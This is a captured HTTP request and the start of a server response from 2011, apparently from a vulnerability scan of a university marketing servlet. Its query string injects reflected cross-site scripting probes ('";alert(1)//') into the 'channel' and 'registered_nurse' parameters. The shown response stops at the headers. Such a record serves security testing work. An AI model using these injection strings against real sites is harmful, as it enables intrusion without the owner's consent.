GET /AptiNet/hhs?pid=62A1E89CCBA3FB2D&pvp_design=design105&kw=design105&kw=&channel=banr68743%22%3Balert%281%29%2F%2Fbb61ffcaafd&category=&psrc=&psrc_url=&vrefid=&creative_id=38954353&creative_desc=20DR_Button_Orange_728x90_F9_Tag_swf&keyword=msn_careers_728x90_425006&v1=aptm&v2=8909-112&v3=&v4=&v5=&v6=&v7=&v8=&country_codes=&country=&salutation=&first_name=&last_name=&email_address=&address=&address_2=&city=&state=-X-&postal_code_int=&postal_code=&program_type=&program_type2=1&pvp_campaign=14610_0957_9_95&pvp_campaign_int=&level_education=-X-&foreign_credit=&military=&us_citizen=&pvp_page1_orderid=&kwmatch=all&unit=dir&provider=MSN&initiative=gen&mktg_prog=gen&version=728x90&classification=dir_dsply&destination=aptm&distribution=plcmt_targ&user1=cpm&user2=dr&user3=1&user4=&user5=&clientdelivery=&registered_nurse=no2e90f"%3balert(1)//35db81cf6d89d4995&mvtkey=52D7F2695BDD54B4 HTTP/1.1
Host: www.aptm.phoenix.edu
Proxy-Connection: keep-alive
Referer: http://www.aptm.phoenix.edu/AptiNet/HTTPHandlerServlet
Cache-Control: max-age=0
Origin: http://www.aptm.phoenix.edu
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mppredirect=47054; aptmimpressions=34847_0608_909_11; cmTPSet=Y; CoreID6=27675665931513038435624&ci=90223951; __utmz=29294973.1303843563.1.1.utmcsr=s0.2mdn.net|utmccn=(referral)|utmcmd=referral|utmcct=/1676624/20DR_Button_Orange_728x90_F9_Tag.swf; crk=135047407.5; vid=51921951; country=US; postal_code=5672; plid=47054; __utma=29294973.1152394048.1303843563.1303843563.1303843563.1; __utmc=29294973; __utmb=29294973.4.10.1303843563; 90223951_clogin=l=1303843562&v=1&e=1303845583441; linkplidlist=47054

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 19:04:00 GMT
Server: Apache/2.2.3 (CentOS)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT+00:00
X-Powered-By: Servlet 2.4; JBo